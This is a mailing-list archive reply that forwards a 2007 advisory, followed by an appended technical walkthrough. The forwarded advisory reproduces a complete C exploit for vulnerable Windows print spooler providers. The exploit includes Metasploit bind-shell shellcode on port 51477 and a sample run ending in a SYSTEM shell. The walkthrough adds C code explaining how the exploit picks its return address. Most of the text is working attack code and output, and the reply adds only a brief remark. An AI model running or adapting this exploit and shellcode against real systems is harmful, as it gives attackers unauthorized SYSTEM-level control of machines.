Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
Re: [security-alerts] FW: [EXPL] Universal Exploit for Vulnerable Printer Providers (Spooler Service)
Dear Kazennov, Vladimir,
This concerns print providers other than Microsoft's (Citrix, Novell,
various non-Microsoft LPRs and the like). And it is hard to call the bug
remote. In short, it definitely has nothing to do with e-mail security :)
--Tuesday, January 30, 2007, 1:23:30 PM, you wrote to security-alerts@xxxxxxxxxxxxxx:
>> -----Original Message-----
>> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
>> Sent: Monday, January 29, 2007 8:17 PM
>> To: html-list@xxxxxxxxxxxxxx
>> Subject: [EXPL] Universal Exploit for Vulnerable Printer
>> Providers (Spooler Service)
>>
>>
>>
>> Universal Exploit for Vulnerable Printer Providers (Spooler Service)
>>
>>
>>
>> A vulnerability in the way Printer Providers work allows local
>> attackers to cause the spooler service to crash and potentially execute
>> arbitrary code. The following exploit code can be used to
>> test your system.
>>
>>
>> Exploit:
>> /********************Private exploit- internal use
>> only*****************
>> Title: Universal exploit for vulnerable printer providers
>> (spooler service).
>> Vulnerability: Insecure EnumPrintersW() calls
>> Author: Andres Tarasco Acuña - atarasco@xxxxxx
>> Website: http://www.514.es
>>
>>
>> This code should allow gaining SYSTEM privileges with the
>> following software:
>> blink !blink! blink!
>>
>> - DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED &
>> NOTFIXED -0day!!!
>> - Citrix Metaframe - cpprov.dll - FIXED
>> - Novell (nwspool.dll - CVE-2006-5854 - untested)
>> - More undisclosed stuff =)
>>
>> If this code crashes your spooler service (spoolsv.exe) check your
>> "vulnerable" printer providers at:
>>
>> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers
>>
>> Workaround: Trust only default printer providers "Internet
>> Print Provider"
>> and "LanMan Print Services" and delete the other ones.
>>
>> And remember, if it doesn't work for you, tweak it yourself.
>> Do not ask.
>>
>>
>> D:\Programación\EnumPrinters\Exploits>testlpc.exe
>> [+] Citrix Presentation Server - EnumPrinterW() Universal exploit
>> [+] Exploit coded by Andres Tarasco - atarasco@xxxxxx
>>
>>
>> [+] Connecting to spooler LPC port \RPC Control\spoolss
>> [+] Trying to locate valid address (1 tries)
>> [+] Mapped memory. Client address: 0x003d0000
>> [+] Mapped memory. Server address: 0x00a70000
>> [+] Targeting return address to : 0x00A700A7
>> [+] Writing to shared memory...
>> [+] Written 0x1000 bytes
>> [+] Exploiting vulnerability....
>> [+] Exploit complete. Now Connect to 127.0.0.1:51477
>>
>>
>> D:\Programación\EnumPrinters>nc localhost 51477
>> Microsoft Windows XP [Versión 5.1.2600]
>> (C) Copyright 1985-2001 Microsoft Corp.
>>
>> C:\WINDOWS\system32>whoami
>> NT AUTHORITY\SYSTEM
>>
>>
>> 514 ownz u
>> ********************Private exploit- internal use
>> only*****************/
>> #include <stdio.h>
>> #include <stdlib.h>   /* exit() */
>> #include <string.h>   /* memset(), memcpy(), wcslen() */
>> #include <windows.h>
>> #include <Winspool.h>
>> #pragma comment(lib,"Winspool.lib")
>>
>>
>> #define REQUIRED_SIZE 0x1000
>>
>> unsigned char shellcode[] =
>> /*Just a metasploit shellcode - Bindshell 51477 */
>> "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe6"
>> "\xc0\xc6\x10\x83\xeb\xfc\xe2\xf4\x1a\xaa\x2d\x5d\x0e\x39\x39\xef"
>> "\x19\xa0\x4d\x7c\xc2\xe4\x4d\x55\xda\x4b\xba\x15\x9e\xc1\x29\x9b"
>> "\xa9\xd8\x4d\x4f\xc6\xc1\x2d\x59\x6d\xf4\x4d\x11\x08\xf1\x06\x89"
>> "\x4a\x44\x06\x64\xe1\x01\x0c\x1d\xe7\x02\x2d\xe4\xdd\x94\xe2\x38"
>> "\x93\x25\x4d\x4f\xc2\xc1\x2d\x76\x6d\xcc\x8d\x9b\xb9\xdc\xc7\xfb"
>> "\xe5\xec\x4d\x99\x8a\xe4\xda\x71\x25\xf1\x1d\x74\x6d\x83\xf6\x9b"
>> "\xa6\xcc\x4d\x60\xfa\x6d\x4d\x50\xee\x9e\xae\x9e\xa8\xce\x2a\x40"
>> "\x19\x16\xa0\x43\x80\xa8\xf5\x22\x8e\xb7\xb5\x22\xb9\x94\x39\xc0"
>> "\x8e\x0b\x2b\xec\xdd\x90\x39\xc6\xb9\x49\x23\x76\x67\x2d\xce\x12"
>> "\xb3\xaa\xc4\xef\x36\xa8\x1f\x19\x13\x6d\x91\xef\x30\x93\x95\x43"
>> "\xb5\x93\x85\x43\xa5\x93\x39\xc0\x80\xa8\x0f\x05\x80\x93\x4f\xf1"
>> "\x73\xa8\x62\x0a\x96\x07\x91\xef\x30\xaa\xd6\x41\xb3\x3f\x16\x78"
>> "\x42\x6d\xe8\xf9\xb1\x3f\x10\x43\xb3\x3f\x16\x78\x03\x89\x40\x59"
>> "\xb1\x3f\x10\x40\xb2\x94\x93\xef\x36\x53\xae\xf7\x9f\x06\xbf\x47"
>> "\x19\x16\x93\xef\x36\xa6\xac\x74\x80\xa8\xa5\x7d\x6f\x25\xac\x40"
>> "\xbf\xe9\x0a\x99\x01\xaa\x82\x99\x04\xf1\x06\xe3\x4c\x3e\x84\x3d"
>> "\x18\x82\xea\x83\x6b\xba\xfe\xbb\x4d\x6b\xae\x62\x18\x73\xd0\xef"
>> "\x93\x84\x39\xc6\xbd\x97\x94\x41\xb7\x91\xac\x11\xb7\x91\x93\x41"
>> "\x19\x10\xae\xbd\x3f\xc5\x08\x43\x19\x16\xac\xef\x19\xf7\x39\xc0"
>> "\x6d\x97\x3a\x93\x22\xa4\x39\xc6\xb4\x3f\x16\x78\x16\x4a\xc2\x4f"
>> "\xb5\x3f\x10\xef\x36\xc0\xc6\x10";
>>
>> typedef struct _UNICODE_STRING {
>> USHORT Length;
>> USHORT MaximumLength;
>> PWSTR Buffer;
>> } UNICODE_STRING;
>>
>>
>> typedef struct LpcSectionMapInfo{
>> DWORD Length;
>> DWORD SectionSize;
>> DWORD ServerBaseAddress;
>> } LPCSECTIONMAPINFO;
>>
>>
>> typedef struct LpcSectionInfo {
>> DWORD Length;
>> HANDLE SectionHandle;
>> DWORD Param1;
>> DWORD SectionSize;
>> DWORD ClientBaseAddress;
>> DWORD ServerBaseAddress;
>> } LPCSECTIONINFO;
>>
>>
>> #define SHARED_SECTION_SIZE 0x1000
>>
>> typedef struct _OBJDIR_INFORMATION {
>> UNICODE_STRING ObjectName;
>> UNICODE_STRING ObjectTypeName;
>> BYTE Data[1];
>> } OBJDIR_INFORMATION;
>>
>> typedef struct _OBJECT_ATTRIBUTES {
>> ULONG Length;
>> HANDLE RootDirectory;
>> UNICODE_STRING *ObjectName;
>> ULONG Attributes;
>> PVOID SecurityDescriptor;
>> PVOID SecurityQualityOfService;
>> } OBJECT_ATTRIBUTES;
>>
>> #define InitializeObjectAttributes( p, n, a, r, s ) { \
>> (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
>> (p)->RootDirectory = r; \
>> (p)->Attributes = a; \
>> (p)->ObjectName = n; \
>> (p)->SecurityDescriptor = s; \
>> (p)->SecurityQualityOfService = NULL; \
>> }
>>
>>
>> typedef DWORD (WINAPI *NTCREATESECTION)(
>> HANDLE* SectionHandle,
>> unsigned long DesiredAccess,
>> OBJECT_ATTRIBUTES *ObjectAttributes,
>> PLARGE_INTEGER MaximumSize,
>> unsigned long PageAttributess,
>> unsigned long SectionAttributes,
>> HANDLE FileHandle);
>>
>> typedef DWORD (WINAPI *NTCONNECTPORT)(
>> HANDLE *ClientPortHandle,
>> UNICODE_STRING *ServerPortName,
>> SECURITY_QUALITY_OF_SERVICE *SecurityQos,
>> DWORD *ClientSharedMemory,
>> DWORD *ServerSharedMemory,
>> DWORD *MaximumMessageLength,
>> DWORD *ConnectionInfo OPTIONAL,
>> DWORD *ConnectionInfoLength);
>>
>>
>> LARGE_INTEGER ConnectToLPCPort(void){
>> /* Thanks goes to Cesar Cerrudo for the WLSI paper */
>> HANDLE hPort;
>> LPCSECTIONINFO sectionInfo;
>> LPCSECTIONMAPINFO mapInfo;
>> byte ConnectDataBuffer[100];
>> DWORD Size = sizeof(ConnectDataBuffer);
>> WCHAR * uString=L"\\RPC Control\\spoolss";
>> DWORD i;
>> UNICODE_STRING uStr;
>> LARGE_INTEGER ret;
>>
>>
>> NTCONNECTPORT NtConnectPort;
>> NTCREATESECTION NtCreateSection;
>>
>> ret.QuadPart=0;
>> for (i=0;i<100;i++)
>> ConnectDataBuffer[i]=0x0;
>>
>>
>> NtConnectPort=
>> (NTCONNECTPORT)GetProcAddress(GetModuleHandle("NTDLL.DLL"),
>> "NtConnectPort");
>> NtCreateSection=
>> (NTCREATESECTION)GetProcAddress(GetModuleHandle("NTDLL.DLL"),
>> "NtCreateSection");
>>
>> if ( (!NtConnectPort) || (!NtCreateSection) ) {
>> printf("[-] Error Loading functions\n");
>> } else {
>> HANDLE hSection;
>> LARGE_INTEGER SecSize;
>> DWORD maxSize=0;
>> SECURITY_QUALITY_OF_SERVICE qos;
>> DWORD qosSize=4;
>>
>> //create shared section
>> SecSize.LowPart=REQUIRED_SIZE;//0x1000;
>> SecSize.HighPart=0x0;
>>
>> qos.Length =(DWORD)&qosSize;
>> qos.ImpersonationLevel =SecurityIdentification;
>> qos.ContextTrackingMode =0x01000101;
>> qos.EffectiveOnly =0x10000;
>>
>>
>> NtCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAGE_READWRITE,SEC_COMMIT,NULL);
>>
>> //connect to lpc
>> memset(&sectionInfo, 0, sizeof(sectionInfo));
>> memset(&mapInfo, 0, sizeof(mapInfo));
>>
>> sectionInfo.Length = 0x18;
>> sectionInfo.SectionHandle =hSection;
>> sectionInfo.SectionSize = SHARED_SECTION_SIZE;
>> mapInfo.Length = 0x0C;
>>
>> uStr.Length = wcslen(uString)*2;
>> uStr.MaximumLength = wcslen(uString)*2+2;
>> uStr.Buffer =uString;
>>
>> //connect to LPC port
>> if (!NtConnectPort(&hPort,&uStr,&qos,(DWORD *)&sectionInfo,(DWORD *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){
>> ret.LowPart=sectionInfo.ClientBaseAddress ;
>> ret.HighPart=sectionInfo.ServerBaseAddress;
>> }
>>
>>
>> }
>> return(ret);
>> }
>>
>> #define BOFSIZE 300 // Change it if a larger size is needed to exploit your printer provider
>>
>> int main(int argc, char* argv[])
>> {
>>
>> unsigned char exploit[BOFSIZE];
>> unsigned char buffer[REQUIRED_SIZE];
>> DWORD dwSizeNeeded,n=0;
>> DWORD datalen=REQUIRED_SIZE;
>> LARGE_INTEGER dirs;
>> HANDLE hProcess;
>> DWORD write;
>> char *p,i;
>> #define lpLocalAddress dirs.LowPart
>> #define lpTargetAddress dirs.HighPart
>>
>> printf("[+] Universal exploit for printer spooler providers\n");
>> printf("[+] Some Citrix metaframe, DiskAccess and Novell versions are affected\n");
>> printf("[+] Exploit by Andres Tarasco - atarasco@xxxxxx\n\n");
>>
>> printf("[+] Connecting to spooler LPC port \\RPC Control\\spoolss\n");
>> printf("[+] Trying to locate valid address");
>>
>>
>> do {
>> dirs=ConnectToLPCPort();
>> if (lpLocalAddress==0){
>> printf("[-] Unable to connect to spooler LPC port\n");
>> printf("[-] Check if the service is running\n");
>> exit(0);
>> }
>> i=lpTargetAddress>>24; // & 0xFF000000 == 0
>> n++;
>> if (n==100) {
>> printf("\n[-] Unable to locate a valid address after %i tries\n",n);
>> printf("[?] Maybe a greater REQUIRED_SIZE should help. Try increasing it\n");
>> return(0);
>> }
>> }while (i!=0);
>>
>> printf(" (%i tries)\n",n);
>>
>> printf("[+] Mapped memory. Client address: 0x%8.8x\n",lpLocalAddress);
>> printf("[+] Mapped memory. Server address: 0x%8.8x\n",lpTargetAddress);
>>
>>
>> i=(lpTargetAddress<<8)>>24;
>> //Fill all with rets. who cares where is it.
>> memset(exploit,i,sizeof(exploit));
>> exploit[sizeof(exploit)-1]='\0';
>>
>> /*
>> memset(exploit,'A',sizeof(exploit)-1);
>> exploit[262]= (lpTargetAddress<<8)>>24; //EIP for Diskaccess
>> exploit[263]= (lpTargetAddress<<8)>>24; //EIP for Diskaccess
>> exploit[264]='\0';
>> */
>>
>> printf("[+] Targeting return address to : 0x00%2.2X00%2.2X\n",exploit[262],exploit[262]);
>>
>> p=(char *)lpLocalAddress;
>>
>> memset(&buffer[0],0x90,sizeof(buffer)-1);
>>
>> memcpy(&buffer[sizeof(buffer)-sizeof(shellcode)-10],shellcode,sizeof(shellcode));
>>
>> printf("[+] Writing to shared memory...\n");
>> if ( (hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE,
>> GetCurrentProcessId()))!= NULL )
>> {
>> if ( WriteProcessMemory( hProcess, p, &buffer[0],
>> REQUIRED_SIZE, &write )!=0 )
>> {
>> printf("[+] Written 0x%x bytes \n",write);
>> printf("[+] Exploiting vulnerability....\n");
>> printf("[+] Exploit complete. Now try to connect to 127.0.0.1:51477\n");
>> printf("[+] and check if you are system =)\n");
>> EnumPrintersA ( PRINTER_ENUM_NAME, (char *)exploit, 1,
>> NULL, 0, &dwSizeNeeded, &n );
>> return(1);
>> }
>> }
>> printf("[+] Something failed. Good luck next time\n");
>> return(0);
>> }
>>
>> // milw0rm.com [2007-01-29]
>>
>>
>> Additional Information:
>> The information has been provided by Andres Tarasco Acuña
>> <mailto:atarasco@xxxxxx> .
>> The original article can be found at: http://www.514.es
>>
>>
--
~/ZARAZA
The trouble will start at eight. (Twain)
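The part of testlpc.exe that is easy to miss is why it spins until the spooler-side section address has a zero high byte, and how a printer name made of one repeated byte ends up as the return address 0x00A700A7 shown in the sample run. The exploit calls EnumPrintersA(), the spooler widens the ANSI name to UTF-16 before the provider's EnumPrintersW() sees it, so each byte XX becomes "XX 00"; once that wide copy overruns the provider's stack buffer, the saved return address reads, little-endian, as 0x00XX00XX. Picking XX as byte 2 of the section's server base (the `(lpTargetAddress<<8)>>24` line) puts that value inside the 0x1000-byte page that was filled with 0x90 through the shared section. The portable C below models that address selection and the widening; it is an added example, not code from the advisory or from 514.es, and makes two assumptions it labels in the comments: a single-byte code page for the widening, and a return-slot offset of 2*262 = 524 taken from the commented-out DiskAccess variant in testlpc (`exploit[262]`, `exploit[263]`), which is provider-specific.

```c
/* Added example: models testlpc.exe's address-selection trick in portable C.
 * Not from the advisory or from Andres Tarasco's code. Sample values
 * (server base 0x00A70000, BOFSIZE 300, shellcode 345 bytes incl. NUL)
 * come from the posted run and listing. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define SECTION_SIZE  0x1000u /* REQUIRED_SIZE / SHARED_SECTION_SIZE in testlpc */
#define SHELLCODE_PAD 10u     /* testlpc puts the shellcode 10 bytes before page end */
#define MAX_BOF       512u    /* model limit; testlpc uses BOFSIZE 300 */

/* i = (lpTargetAddress << 8) >> 24 in testlpc: byte 2 of the server base. */
uint8_t fill_byte_for(uint32_t server_base)
{
    return (uint8_t)((server_base << 8) >> 24);
}

/* A server-side section base is usable when its high byte is zero (what the
 * do/while loop in testlpc waits for) and its low 16 bits are zero (true in
 * practice because of the 64 KiB allocation granularity, never checked by
 * testlpc). The fill byte must also be non-zero: a zero byte would end the
 * C string before it reaches the return slot. */
int server_base_usable(uint32_t server_base)
{
    return (server_base >> 24) == 0 && (server_base & 0xFFFFu) == 0 &&
           fill_byte_for(server_base) != 0;
}

/* Assumption: ANSI -> UTF-16LE widening under a single-byte code page, so
 * each input byte becomes (byte, 0x00). Returns the number of bytes written,
 * or 0 if `out` is too small. */
size_t widen_utf16le(const uint8_t *narrow, size_t n, uint8_t *out, size_t out_cap)
{
    size_t i;
    if (out_cap < 2 * n) return 0;
    for (i = 0; i < n; i++) {
        out[2 * i]     = narrow[i];
        out[2 * i + 1] = 0x00;
    }
    return 2 * n;
}

/* Little-endian DWORD at p, as a 32-bit x86 `ret` would load it. */
uint32_t le32_at(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Value the saved return address takes when testlpc's name string
 * (bofsize-1 copies of the fill byte plus a NUL, mirroring
 * memset(exploit,i,...); exploit[sizeof(exploit)-1]=0) is widened and the
 * overrun reaches the return slot at byte `ret_off` of the wide copy.
 * `ret_off` is provider-specific; 524 is the assumption derived from the
 * DiskAccess comment in testlpc. Returns 0 when the overrun is too short. */
uint32_t predicted_eip(uint32_t server_base, size_t bofsize, size_t ret_off)
{
    uint8_t narrow[MAX_BOF], wide[2 * MAX_BOF];
    size_t wide_len;
    if (!server_base_usable(server_base) || bofsize == 0 || bofsize > MAX_BOF) return 0;
    memset(narrow, fill_byte_for(server_base), bofsize - 1);
    narrow[bofsize - 1] = 0;
    wide_len = widen_utf16le(narrow, strlen((const char *)narrow), wide, sizeof wide);
    if (ret_off + 4 > wide_len) return 0;
    return le32_at(wide + ret_off);
}

/* True when eip lands in the 0x90 sled testlpc wrote through the shared
 * section: inside the page and before the shellcode at its end. */
int eip_in_sled(uint32_t server_base, uint32_t eip, size_t shellcode_len)
{
    uint32_t sled_end = server_base + SECTION_SIZE - (uint32_t)shellcode_len - SHELLCODE_PAD;
    return eip >= server_base && eip < sled_end;
}

int main(void)
{
    uint32_t server_base = 0x00A70000u; /* from the posted run */
    uint32_t eip = predicted_eip(server_base, 300, 524);
    printf("fill byte 0x%02X -> EIP 0x%08X (in sled: %s)\n",
           fill_byte_for(server_base), eip,
           eip_in_sled(server_base, eip, 345) ? "yes" : "no");
    return 0;
}
```

Because the fill byte is at most 0xFF and the sled runs from the page start to 0x1000 minus the shellcode and its 10-byte pad, every usable base lands EIP in the sled; the only things the attacker waits for are the zero high byte and a non-zero byte 2, which is why the exploit simply reconnects to the LPC port until it gets one.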